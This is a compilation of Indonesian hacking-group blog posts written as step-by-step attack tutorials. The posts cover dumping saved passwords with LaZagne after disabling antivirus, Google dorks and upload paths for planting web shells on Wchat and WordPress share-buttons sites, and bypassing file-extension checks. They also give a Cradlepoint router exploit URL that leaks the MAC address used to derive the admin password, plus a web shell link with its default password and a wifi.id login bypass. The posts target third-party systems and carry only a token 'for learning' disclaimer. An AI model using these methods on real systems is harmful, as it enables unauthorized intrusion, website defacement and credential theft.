Cara Mengambil Semua Kata Sandi YangTersimpan dari Browsers, WiFi, Memory

The LaZagne Project: Mengambil Semua Kata Sandi YangTersimpan dari Browsers, WiFi, Memory


Apa Kabar Lagi Tod :v, Lama w gak ngeposting lg..Di karenakan w lg sibuk :v

Oke kali ini saya akan ngepost salah satu tools yang dapat merekam password atau log di laptop/PC :v

Tapi tutor ini hanya untuk pembelajaran ya tod :v, jangan di salah gunakan :v

Tools ini w beri nama LaZagne :v

Pertama Kalian Download dlu tools nya ke github saya dalam bentuk *zip :v

Disini :v

Lalu Kalian ekstrak, dan pindah kan ke FlashDisk Kalian :v, gak di pindahkan juga gpp :v

Lalu Panggil Tools nya Dengan Membuka CMD

Lalu Pindahkan ke direktori Flashdisk Kalian,, terserah lah kalian simpan dimana, asalkan tools nya bisa di panggil :v, kalau saya simpan di Flashdisk :v 


Setelah Membuka Direktori nya, lalu kalian panggil tools nya :v
NB: Sebelum Kalian Panggil Tools Nya, Kalian Matikan Dulu Antivirus Kalian. Apalagi Pengguna Windows 10, Matikan Tuh Windows Defender Nya :V


Nah Tools nya udh ke panggil :v, Di tools tersebut terdapat sebuah perintah, mulai dari chats,mails, dll.

Nah sekarang saya akan merekam password di bagian browser saya sendiri :v, maka perintahnya :
laZagne.exe browsers


Lalu Tekan Enter Dan, Croottt :v
  Liat apa yang terjadi :v


Tools tersebut berhasil merekam password di browser saya,,termasuk password facebook saya pun terekam :v.

Oke sekian dari tutorial saya

  @Yoshieichiro_01  |  Garuda Security Hacker

NB: Tutorial ini saya buat hanya untuk pembelajaran saya,, bukan untuk di salah gunakan.

Cara Mengatasi / Bypass Google Chapta Dengan Buster (Auto Solved)


Garudasecurtyhacker.id - kali ini saya akan membagikan tutorial bagaimana untuk mengatasi Google Chapta yang error, tidak berfungsi dengan buster auto solved.

Pernahkan kalian lagi enak enak seacrhing eh malam muncul Google Chapta dan bikin pusing lagi udah di klik beberapa kali dengan benar tetep gak bisa verify ? pasti pernah bahkan sering saya sendiri juga sering sekali.

Dari sana saya berfikir apakah ada yang auto bypassnya cari sana sini coba beberapa ada yang gagal gak work :(, tapi tak putus asa dan akhirnya menemukan deh bagaimana cara bypass google chapta yang mudah dan simple juga.

Informasi Pengembang Dari Add Ons Ini :
Link Github : https://github.com/dessant/busterSupporting the Project
The continued development of Buster is made possible thanks to the support of awesome backers. If you'd like to join them, please consider contributing with Patreon, PayPal or Bitcoin.
Description
Obviously, this blue part here is the land.
— Byron "Buster" Bluth, reading a map
Buster is a browser extension which helps you to solve difficult captchas by completing reCAPTCHA audio challenges using automatic speech recognition. Challenges are solved by clicking on the extension button at the bottom of the reCAPTCHA widget.
reCAPTCHA challenges remain a considerable burden on the web, delaying and often blocking our access to services and information depending on our physical and cognitive abilities, our social and cultural background, and the devices or networks we connect from.
The difficulty of captchas can be so out of balance, that sometimes they seem friendlier to bots than they are to humans.
The goal of this project is to improve our experience with captchas, by giving us easy access to solutions already utilized by automated systems.
License
Copyright (c) 2018-2019 Armin Sebastian
This software is released under the terms of the GNU General Public License v3.0. See the LICENSE file for further information.

Langsung saja untuk tutorialnya silakan ikuti langkah2 berikut tutorial ini di praktekan di Browser Google Chrome.

Pertama kalian install dulu add ons dari chrome yang bernama Buster: Captcha Solver for Humans
Cara Mengatasi / Bypass Google Chapta Dengan Buster (Auto Solved)
 silakan kalian klik Add seperti pada panah untuk berikut link Add Ons nya
https://chrome.google.com/webstore/detail/buster-captcha-solver-for/mpbjkejclgfgadiemmefgebjfooflfhl/related
Jika sudah di klik maka akan muncul tab kecil dan klik saja add juga untuk proses instalasi ke chrome kalian.
Cara Mengatasi / Bypass Google Chapta Dengan Buster (Auto Solved)


 Maka jika sudah berhasil akan muncuk di bar atas sebelah kanan icon berikut
Cara Mengatasi / Bypass Google Chapta Dengan Buster (Auto Solved)

Itu artinya Auto Google Chaptanya sudah berhasil di pasang, selanjutnya cara penggunaanya.

Untuk cara penggunannya cukup simple sederhana, jika kalian menemukan google chapta makan akan muncul icon auto buster nya seperti contoh
Cara Mengatasi / Bypass Google Chapta Dengan Buster (Auto Solved)

Jika sudah muncul kalian klik saja icon itu dan akan muncul proses autonya seperti gambar berikut
Cara Mengatasi / Bypass Google Chapta Dengan Buster (Auto Solved)

Dan diam kan beberapa detik tergantung sinyal / koneksi kalian, jika sudah maka chapta akan berhail di lewati
Cara Mengatasi / Bypass Google Chapta Dengan Buster (Auto Solved)

Dan kalian bisa browseing kembali dengan leluasa, jika muncul google chapta lagi tinggal klik iconnya dan beres, ini mengatasi error google chapta yang kadang memang suka error selain itu mengefisieunkan waktu kita tanpa harus klik klik satu persatu.

Akhir kata semoga informasi ini dapat membantu kalian dan menambah wawasan kalian dalam dunia IT yang sangat luas ini, Jangan lupa untuk bagikan artikel ini

Deface Metode Wchat Shell Upload


GarudaSecurityHacker.id - kali ini saya mau bagikan metode deface lagi Wchat Shell Upload, tanpa basa basi karena males ngetik panjang panjang :D, langsung saja kalian pastekan dorknya di google
Dork : "Wchat -  Admin Login"
Silakan pilih situs target sesuai selera kallian, dan selanjutnya masukan exploitnya
 Exploit :
http://[SITE]/register.php
Silakan kalian isi semua form yang tersedia.

Jika sudah Daftar langsung saja login dan akan di arahkan ke dashboard utama
Silakan klik Edit Profile untuk upload shell kalian di bagian titik tiga.

Upload shell kalian untuk extensinya .pthml , selanjutnya akses shellnya klik kanan pada foto profile

Dan backdoor pun berhasil di upload , kalian bebas melakukan apapun


Yap itulah tutorial Deface Metode Wchat Shell Upload, semoga berguna bagi kalian.


Cradlepoint Router Password Disclosure With Shodan


Garudasecurityhacker.id - Halo selamat malam, kali ini saya iseng iseng baca artikel dan nemuin exploit buat Router Cradlepoint , meski ane bingun juga sih karena yah bahasa inggris ane kurang banget :(

Apa Sih Cradlepoint ?
Cradlepoint adalah Cabang, jaringan seluler, dan IoT edge sedang mengalami perubahan dramatis - dan membawa WAN perusahaan tradisional ke titik puncaknya. Organisasi harus mengelola situs cabang yang kompleks; armada kendaraan data-driven dan pusat komando seluler; sejumlah besar kasus penggunaan IoT dan M2M; dan segala sesuatu di antaranya.
Didirikan pada tahun 2006, Cradlepoint telah tumbuh menjadi pemimpin industri dalam solusi jaringan 4G LTE yang disalurkan secara cloud untuk bisnis, penyedia layanan, dan organisasi pemerintah, dan kami berkomitmen untuk memperluas kepemimpinan kami ke ruang 5G yang baru muncul. Lebih dari 23.000 pelanggan di seluruh dunia dalam bidang ritel, layanan keuangan, perawatan kesehatan, transportasi, sektor publik, dan industri lainnya mengandalkan Cradlepoint untuk menjaga cabang dan jaringan seluler mereka, dan perangkat IoT, selalu terhubung dan dilindungi. Visi Elastic Edge ™ kami menyediakan cetak biru untuk generasi berikutnya, jaringan tepi yang ditentukan oleh perangkat lunak yang dibangun di atas layanan nirkabel 4G / 5G yang luas dan andal, menghubungkan orang, tempat, dan hal-hal di mana saja dengan visibilitas, keamanan, dan kontrol kelas perusahaan.
Paket Solusi NetCloud all-inclusive Cradlepoint untuk jaringan cabang, seluler, dan IoT menggabungkan layanan NetCloud yang disesuaikan dengan perangkat keras yang dibuat khusus dan rencana dukungan yang komprehensif. Paket Solusi NetCloud dikelola oleh cloud dan dapat diterapkan di mana saja dalam beberapa hari, bukan bulan.
Cradlepoint adalah perusahaan swasta yang berkantor pusat di Boise, Idaho, dengan pusat pengembangan di Silicon Valley, California, dan kantor internasional di Inggris dan Australia.
Sumber : https://cradlepoint.com/

Yap itulah penjelasan dari Cradlepoint Router, semacam router buat ngatur Jaringan, Transportasi (IoT) dan sebagainya

Langsung aja ke tutorial Cradlepoint Router Password Disclosure With Shodan, pertama kalian buka yang namanya Shodan.io jika sudah masukan keyword
cradlepointhttpservice

Jika sudah kalian pilih target yang "200 OK" dan klik Icon Open link, maka kalian akan ke halaman login routernya

Langsung ajah kalian masukan exploit buat mengetahui passwordnya (WLAN_MAC)
Nah lihat gambar maka akan muncul seperti itu, langsung sajah ambil bagian
http://[ip]/plt?password=W6rqCjk5ijRs6Ya5bv55
Nah selanjutnya kalian scroll kebawah dan akan menemukan

<WLAN_MAC>00:30:44:1b:8a:b5</WLAN_MAC>
Maka itu adalah password defaul dari Routernya, langsung saja ambil 8 karakter terakhir maka jadi seperti ini
441b8ab5
Dan sekarang kembali ke halaman login dan masukan
username : admin
password: 441b8ab5
Maka akan berhasil login ke halaman menu utama router, disana banyak sekali menu silakan di buka buka sendiri karena admin juga belum paham dengan menu2nya dan apa kegunaanya sih


Sekian tutorial malam ini jangan lupa untuk bagikan ke social media kalian
By : Esevenb (Endang Gunawan)


Deface Metode WordPress Share-Buttons Plugins Shell Upload

Deface Metode WordPress Share-Buttons Plugins Shell Upload

Garudasecurityhacker.id - Selamat malam para sobat defacer dimanapun kalian berada di postingan kali ini saya "Esevenb" ingin membagikan exploit  Share-Buttons Plugins Shell Upload.

Langsung saja ke tutorialnya, berikut bahan bahan untuk metode ini 
Google Dork
inurl:''/wp-content/plugins/share-buttons/''
intext:''Sleeker More "Web 2.0" onChange Use''
Kalian pastekan Google Dorknya ke google

Jika sudah silakan pilih targetnya sesuai keinginan dan langsung masukan exploit
Exploit
/wp-content/plugins/share-buttons/upload/index.php
/wp-content/plugins/share-buttons/upload/scripts/ajaxupload.php
jika vuln maka akan muncul seperti gambar di bawah ini

Silakan upload shellnya, disana ada file yang bisa di upload ".gif .jpg .png"
Bypass Shell.php;.gif ~ .asp;.png ~ .shtml.fla;.jpeg

Jika sudah di upload selanjutnya tinggal akses lokasi file yang telah terupload,
Akses File/wp-content/plugins/share-buttons/upload/uploads/

Sekian dulu tutorialnya jangan lupa share dan bagikan.
kunjungi juga fanspage kami : https://facebook.com/gshrealpage

Online Tools (CSRF Exploiter, Encode/Decode, Hash Encrypter, Port Scanner, Zone-H Notifer, Auto Visitor)

Online Tools (CSRF Exploiter, Encode/Decode, Hash Encrypter, Port Scanner, Zone-H Notifer, Auto Visitor)

Online Tools - Garuda Security Hacker - _Tuan2Fay_


_Tuan2Fay_ -  biar mempermudah kreativitas kalian bisa menggunakan tool online ane. Untuk fitur cek sendiri dah xD
Link => Crot sini om

[Link Update] x48x Web Shell

[SHELL] x48x Web Shell

[SHELL] x48x Web Shell


_Tuan2Fay_ | blog.garudasecurityhacker.org - versi dan fitur masih sama, hanya update link yang mokad ae xD

Fitur :

Fitur jg ga banyak2 amat,, ane masukin yg sering di pake sama orang2 aja :v
sama ane modif dikit fitur login nya..
Untuk lebih detail nya cek sendiri aja ya :p

Tampilan :

[SHELL] x48x Web Shell
Sebelum Tercyduck

[SHELL] x48x Web Shell
Sesudah Tercyduck

[SHELL] x48x Web Shell
Sesudah Tercyduck dan Login

Note :
  • Buat munculin form loginnya tinggal di tambahin ?ez=login contoh : x48x.php?ez=login
  • Default passwordnya : melodynl (bisa di ganti sendiri)

Link : Pasted.co
Password : x48x



Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel



Cara Hack Wifi.id Tanpa Login Dan Akun 100% Work

Simak sajah vidionya di bawah ini gan , jangan manja pengen di suapin mulu heheh
==============================
1. Buka login Page Wifi.id
==============================
2. Copy URLnya
==============================
3. Masukan Ke Software
==============================
4 Klik Konek / Login
==============================
5. Sukses
==============================
100% Konek, jangan lupa subscribe :)
==============================
By : EsevenB
http://zonaundergroundindonesia.blogspot.co.id/2017/09/cara-login-wifii-id-gratis-dengan-loginner.html
jangan lupa subscribe juga channel nya, ada banyak tutorial lain juga
channel : 4Sekawan A.k.A Channel EsevenB


Garuda Security Hacker Official Team



Official Website Portal : Garuda Security Hacker | Official Website Portal
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

DEFACE METODE PHP FILE MANAGER UPLOAD SHELL


Setelah sekian lama saya tidak melakukan defacing, iseng iseng saya cari exploit dan langsung saya share sajah buat kalian yang ingin belajar deface. method php file manager upload shell
Note : Maaf Suaaranya Terbata Bata
Jangan Lupa Subscribe Juga Channelnya
By : E7B_404
From : Channel 4Sekawan
Team : Garuda Security Hacker



Garuda Security Hacker Official Team



Official Website Portal : Garuda Security Hacker | Official Website Portal
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Deface Metode IP , Port dan Protocol Forward Di Windows

 Hello gue E7B_404 dah lama gak bikin tutor dan kali ini gue ketitipan amanat baut bikin tutorial
Deface Metode IP Forwading, Port dan Protocol Forward Di Windows, buat klian pecinta linux silkn baca (Deface Metode IP Forwading, Port dan Protocol Forward Di Linux)

 Lu download dulu Ngrok nya buat pesugihan kali ini  silakan download di https://ngrok.com/download kalo udah download lu exrta filenya dimana ajah terserah lu. gue extra di  D ,
kalu udah di exrta bukan CMD via admin, dan lu pergi ke tempat dimna lu naro ngrok.
Selanjutnya jalanin dulu XAMPP / Localhost, centang cukup pada apache sajah gan


Taro file deface lu di localhost dulu dengan nama index.html biar nanti indenya ke tebas, sekarang kalo udah lu ketik ngrok http 80 .

Selanjutnya tekan enter dan biarkan hingga connecting, kalo udah dan berhasil muncul ke gini gan


Lu copy yang gue blo, dan selanjutnya lu buka link tersebut di adres bar dan taraaaa

Cukup sekian tutor dari kami dan thanks buat Fay :) :* cker Official Team


Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel